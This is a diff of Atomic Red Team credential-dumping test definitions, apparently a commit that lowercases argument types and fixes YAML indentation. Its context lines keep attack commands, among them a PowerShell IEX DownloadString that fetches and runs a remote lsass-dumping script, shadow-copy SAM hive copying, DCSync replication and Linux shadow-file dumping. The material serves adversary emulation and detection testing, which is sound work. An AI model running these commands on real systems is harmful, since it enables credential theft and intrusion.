 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -77,8 +77,8 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
-| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
+| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
+| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -170,7 +170,7 @@ If you see a message saying \"The system cannot find the path specified.\", try
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|
+| dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -305,8 +305,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
-| mimikatz_exe | Path of the Mimikatz binary | String | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;x64&#92;mimikatz.exe|
+| input_file | Path of the Lsass dump | path | %tmp%&#92;lsass.DMP|
+| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;x64&#92;mimikatz.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -470,8 +470,8 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
-| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
+| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
+| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -526,7 +526,7 @@ Or, if you try to run the test without the required administrative privleges you
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
+| remote_script | URL to a remote Mimikatz script that dumps credentials | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -611,8 +611,8 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
-| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
+| xordump_exe | Path to xordump | path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
+| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -15,11 +15,11 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path where resulting dump should be placed
-      type: Path
+      type: path
      default: C:\Windows\Temp\lsass_dump.dmp
    procdump_exe:
      description: Path of Procdump executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
  dependency_executor_name: powershell
  dependencies:
@@ -69,7 +69,7 @@ atomic_tests:
  input_arguments:
    dumpert_exe:
      description: Path of Dumpert executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
  dependency_executor_name: powershell
  dependencies:
@@ -88,12 +88,12 @@ atomic_tests:
      del C:\windows\temp\dumpert.dmp >nul 2> nul
    name: command_prompt
    elevation_required: true
-    
+
 - name: Dump LSASS.exe Memory using NanoDump
  auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
  description: |
    The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
-    
+
    https://github.com/helpsystems/nanodump

    Upon successful execution, you should find the nanondump.dmp file in the temp directory
@@ -146,11 +146,11 @@ atomic_tests:
  input_arguments:
    input_file:
      description: Path of the Lsass dump
-      type: Path
+      type: path
      default: '%tmp%\lsass.DMP'
    mimikatz_exe:
      description: Path of the Mimikatz binary
-      type: String
+      type: string
      default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
  dependency_executor_name: powershell
  dependencies:
@@ -224,8 +224,8 @@ atomic_tests:
  - windows
  executor:
    command: |
-       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-       IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
    cleanup_command: |
      Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
    name: powershell
@@ -244,11 +244,11 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path where resulting dump should be placed
-      type: Path
+      type: path
      default: C:\Windows\Temp\lsass_dump.dmp
    procdump_exe:
      description: Path of Procdump executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
  dependency_executor_name: powershell
  dependencies:
@@ -280,7 +280,7 @@ atomic_tests:
  input_arguments:
    remote_script:
      description: URL to a remote Mimikatz script that dumps credentials
-      type: Url
+      type: url
      default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
  executor:
    command: |
@@ -291,7 +291,7 @@ atomic_tests:
  auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
  description: |
    Use createdump executable from .NET to create an LSASS dump.
-    
+
    [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
  supported_platforms:
  - windows
@@ -311,7 +311,7 @@ atomic_tests:
    cleanup_command: |
      Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
    name: powershell
-    elevation_required: true    
+    elevation_required: true
 - name: Dump LSASS.exe using imported Microsoft DLLs
  auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
  description: |
@@ -325,11 +325,11 @@ atomic_tests:
  input_arguments:
    xordump_exe:
      description: Path to xordump
-      type: Path
+      type: path
      default: C:\Windows\Temp\xordump.exe
    output_file:
      description: Path where resulting dump should be placed
-      type: Path
+      type: path
      default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
  dependencies:
  - description: |
@@ -157,9 +157,9 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
-| file_name | Name of the copied file | String | SAM|
-| copy_dest | Destination of the copied file | String | %temp%|
+| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM|
+| file_name | Name of the copied file | string | SAM|
+| copy_dest | Destination of the copied file | string | %temp%|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -239,8 +239,8 @@ This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mit
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_hive | Hive you wish to dump | String | SAM|
-| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | Integer | 10|
+| target_hive | Hive you wish to dump | string | SAM|
+| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|


 #### Attack Commands: Run with `command_prompt`! 
@@ -277,8 +277,8 @@ Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| target_hive | Hive you wish to dump | String | SAM|
-| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | Integer | 10|
+| target_hive | Hive you wish to dump | string | SAM|
+| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10|


 #### Attack Commands: Run with `powershell`! 
@@ -66,15 +66,15 @@ atomic_tests:
  input_arguments:
    file_path:
      description: Path to the file to copy
-      type: Path
+      type: path
      default: '%SystemRoot%/system32/config/SAM'
    file_name:
      description: Name of the copied file
-      type: String
+      type: string
      default: SAM
    copy_dest:
      description: Destination of the copied file
-      type: String
+      type: string
      default: '%temp%'
  executor:
    command: |
@@ -83,7 +83,7 @@ atomic_tests:
    elevation_required: true
    cleanup_command: |
      del #{copy_dest}\#{file_name} >nul 2>&1
-    
+
 - name: PowerDump Hashes and Usernames from Registry
  auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
  description: Executes a hashdump by reading the hashes from the registry.
@@ -112,17 +112,17 @@ atomic_tests:
  input_arguments:
    target_hive:
      description: Hive you wish to dump
-      type: String
+      type: string
      default: SAM
    limit:
      description: Limit to the number of shadow copies to iterate through when trying to copy the hive
-      type: Integer
+      type: integer
      default: 10
  executor:
    command: |
      for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
    name: command_prompt
-    elevation_required: false 
+    elevation_required: false
    cleanup_command: |
      for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)

@@ -135,11 +135,11 @@ atomic_tests:
  input_arguments:
    target_hive:
      description: Hive you wish to dump
-      type: String
+      type: string
      default: SAM
    limit:
      description: Limit to the number of shadow copies to iterate through when trying to copy the hive
-      type: Integer
+      type: integer
      default: 10
  executor:
    command: |
@@ -148,12 +148,12 @@ atomic_tests:
       ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
      }
    name: powershell
-    elevation_required: false 
+    elevation_required: false
    cleanup_command: |
      1..#{limit} | % {
        rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
      }
-      
+
 - name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
  auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
  description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
@@ -50,7 +50,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+| drive_letter | Drive letter to source VSC (including colon) | string | C:|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -101,8 +101,8 @@ This test must be executed on a Windows Domain Controller.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
-| extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
+| vsc_name | Name of Volume Shadow Copy | string | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
+| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -179,7 +179,7 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
+| output_folder | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -231,7 +231,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| drive_letter | Drive letter to source VSC (including colon and backslash) | String | C:&#92;|
+| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -277,8 +277,8 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| drive_letter | Drive letter to source VSC (including colon and backslash) | String | C:&#92;|
-| target_host | IP Address / Hostname you want to target | String | localhost|
+| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|
+| target_host | IP Address / Hostname you want to target | string | localhost|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -324,9 +324,9 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| source_path | File to shadow copy | String | c:&#92;windows&#92;ntds&#92;ntds.dit|
-| target_path | Target path of the result file | String | c:&#92;ntds.dit|
-| target_host | IP Address / Hostname you want to target | String | localhost|
+| source_path | File to shadow copy | string | c:&#92;windows&#92;ntds&#92;ntds.dit|
+| target_path | Target path of the result file | string | c:&#92;ntds.dit|
+| target_host | IP Address / Hostname you want to target | string | localhost|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -373,7 +373,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| drive_letter | Drive letter to source VSC (including colon) | String | C:&#92;|
+| drive_letter | Drive letter to source VSC (including colon) | string | C:&#92;|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -408,8 +408,8 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| drive_letter | Drive letter to source VSC (including colon) | String | C:|
-| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
+| drive_letter | Drive letter to source VSC (including colon) | string | C:|
+| symlink_path | symlink path | string | C:&#92;Temp&#92;vssstore|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -12,7 +12,7 @@ atomic_tests:
  input_arguments:
    drive_letter:
      description: Drive letter to source VSC (including colon)
-      type: String
+      type: string
      default: 'C:'
  dependencies:
  - description: |
@@ -42,11 +42,11 @@ atomic_tests:
  input_arguments:
    vsc_name:
      description: Name of Volume Shadow Copy
-      type: String
+      type: string
      default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
    extract_path:
      description: Path for extracted NTDS.dit
-      type: Path
+      type: path
      default: C:\Windows\Temp
  dependencies:
  - description: |
@@ -94,7 +94,7 @@ atomic_tests:
  input_arguments:
    output_folder:
      description: Path where resulting dump should be placed
-      type: Path
+      type: path
      default: C:\Windows\Temp\ntds_T1003
  dependencies:
  - description: |
@@ -123,7 +123,7 @@ atomic_tests:
  input_arguments:
    drive_letter:
      description: Drive letter to source VSC (including colon and backslash)
-      type: String
+      type: string
      default: 'C:\'
  dependencies:
  - description: |
@@ -148,11 +148,11 @@ atomic_tests:
  input_arguments:
    drive_letter:
      description: Drive letter to source VSC (including colon and backslash)
-      type: String
+      type: string
      default: 'C:\'
    target_host:
      description: IP Address / Hostname you want to target
-      type: String
+      type: string
      default: localhost
  dependencies:
  - description: |
@@ -177,15 +177,15 @@ atomic_tests:
  input_arguments:
    source_path:
      description: File to shadow copy
-      type: String
+      type: string
      default: 'c:\windows\ntds\ntds.dit'
    target_path:
      description: Target path of the result file
-      type: String
+      type: string
      default: 'c:\ntds.dit'
    target_host:
      description: IP Address / Hostname you want to target
-      type: String
+      type: string
      default: localhost
  dependencies:
  - description: |
@@ -211,7 +211,7 @@ atomic_tests:
  input_arguments:
    drive_letter:
      description: Drive letter to source VSC (including colon)
-      type: String
+      type: string
      default: 'C:\'
  executor:
    command: |
@@ -230,11 +230,11 @@ atomic_tests:
  input_arguments:
    drive_letter:
      description: Drive letter to source VSC (including colon)
-      type: String
+      type: string
      default: 'C:'
    symlink_path:
      description: symlink path
-      type: String
+      type: string
      default: 'C:\Temp\vssstore'
  executor:
    command: |
@@ -29,7 +29,7 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|
+| psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -13,7 +13,7 @@ atomic_tests:
  input_arguments:
    psexec_exe:
      description: Path to PsExec executable
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
  dependency_executor_name: powershell
  dependencies:
@@ -33,9 +33,9 @@ Privileges required: domain admin or domain controller account (by default), or
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| domain | Targeted Active Directory domain | String | %userdnsdomain%|
-| user | Targeted user | String | krbtgt|
-| mimikatz_path | Mimikatz windows executable | Path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
+| domain | Targeted Active Directory domain | string | %userdnsdomain%|
+| user | Targeted user | string | krbtgt|
+| mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|


 #### Attack Commands: Run with `command_prompt`! 
@@ -90,7 +90,7 @@ https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
+| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|


 #### Attack Commands: Run with `powershell`! 
@@ -9,19 +9,19 @@ atomic_tests:
    Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
    [Reference](https://adsecurity.org/?p=1729)
  supported_platforms:
-    - windows
+  - windows
  input_arguments:
    domain:
      description: Targeted Active Directory domain
-      type: String
+      type: string
      default: '%userdnsdomain%'
    user:
      description: Targeted user
-      type: String
+      type: string
      default: krbtgt
    mimikatz_path:
      description: Mimikatz windows executable
-      type: Path
+      type: path
      default: '%tmp%\mimikatz\x64\mimikatz.exe'
  dependency_executor_name: powershell
  dependencies:
@@ -56,7 +56,7 @@ atomic_tests:
  input_arguments:
    logonserver:
      description: ComputerName argument default %logonserver%
-      type: String
+      type: string
      default: $ENV:logonserver.TrimStart("\")
  dependency_executor_name: powershell
  dependencies:
@@ -72,4 +72,4 @@ atomic_tests:
    command: |
      Get-ADReplAccount -All -Server #{logonserver}
    name: powershell
-    elevation_required: False
+    elevation_required: false
@@ -31,9 +31,9 @@ copy process memory to an external file so it can be searched or exfiltrated lat
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
-| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
-| pid_term | Unique string to use to identify target process | String | T1003.007|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
+| pid_term | Unique string to use to identify target process | string | T1003.007|


 #### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
@@ -92,10 +92,10 @@ copy a process's heap memory to an external file so it can be searched or exfilt
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
-| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
-| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
-| pid_term | Unique string to use to identify target process | String | T1003.007|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
+| python_script | Path to script generating the target process | path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
+| pid_term | Unique string to use to identify target process | string | T1003.007|


 #### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
@@ -162,8 +162,8 @@ See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
-| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.007Test3.txt|
+| MimiPenguin_Location | Path of MimiPenguin script | path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|


 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
@@ -1,4 +1,3 @@
---
 attack_technique: T1003.007
 display_name: 'OS Credential Dumping: Proc Filesystem'
 atomic_tests:
@@ -9,31 +8,31 @@ atomic_tests:
    copy process memory to an external file so it can be searched or exfiltrated later.

  supported_platforms:
-    - linux
+  - linux

  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.007.bin
    script_path:
      description: Path to script generating the target process
-      type: Path
+      type: path
      default: /tmp/T1003.007.sh
    pid_term:
      description: Unique string to use to identify target process
-      type: String
+      type: string
      default: T1003.007

  dependencies:
-    - description: |
-        Script to launch target process must exist
-      prereq_command: |
-        test -f #{script_path}
-        grep "#{pid_term}" #{script_path}
-      get_prereq_command: |
-        echo '#!/bin/sh' > #{script_path}
-        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+  - description: |
+      Script to launch target process must exist
+    prereq_command: |
+      test -f #{script_path}
+      grep "#{pid_term}" #{script_path}
+    get_prereq_command: |
+      echo '#!/bin/sh' > #{script_path}
+      echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}

  executor:
    name: sh
@@ -57,41 +56,41 @@ atomic_tests:
    copy a process's heap memory to an external file so it can be searched or exfiltrated later.

  supported_platforms:
-    - linux
+  - linux

  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.007.bin
    script_path:
      description: Path to script generating the target process
-      type: Path
+      type: path
      default: /tmp/T1003.007.sh
    python_script:
      description: Path to script generating the target process
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
    pid_term:
      description: Unique string to use to identify target process
-      type: String
+      type: string
      default: T1003.007

  dependencies:
-    - description: |
-        Script to launch target process must exist
-      prereq_command: |
-        test -f #{script_path}
-        grep "#{pid_term}" #{script_path}
-      get_prereq_command: |
-        echo '#!/bin/sh' > #{script_path}
-        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
-    - description: |
-        Requires Python
-      prereq_command: |
-        (which python || which python3 || which python2)
-      get_prereq_command: |
-        echo "Python 2.7+ or 3.4+ must be installed"
+  - description: |
+      Script to launch target process must exist
+    prereq_command: |
+      test -f #{script_path}
+      grep "#{pid_term}" #{script_path}
+    get_prereq_command: |
+      echo '#!/bin/sh' > #{script_path}
+      echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+  - description: |
+      Requires Python
+    prereq_command: |
+      (which python || which python3 || which python2)
+    get_prereq_command: |
+      echo "Python 2.7+ or 3.4+ must be installed"

  executor:
    name: sh
@@ -116,11 +115,11 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Path where captured results will be placed
-      type: Path
+      type: path
      default: /tmp/T1003.007Test3.txt
    MimiPenguin_Location:
      description: Path of MimiPenguin script
-      type: Path
+      type: path
      default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
  dependency_executor_name: sh
  dependencies:
@@ -33,7 +33,7 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
@@ -71,7 +71,7 @@ rm -f #{output_file}
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


 #### Attack Commands: Run with `sh`! 
@@ -109,7 +109,7 @@ Dump /etc/passwd and /etc/shadow using ed
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|


 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
@@ -146,7 +146,7 @@ Dump /etc/passwd and /etc/shadow using bash builtins
 #### Inputs:
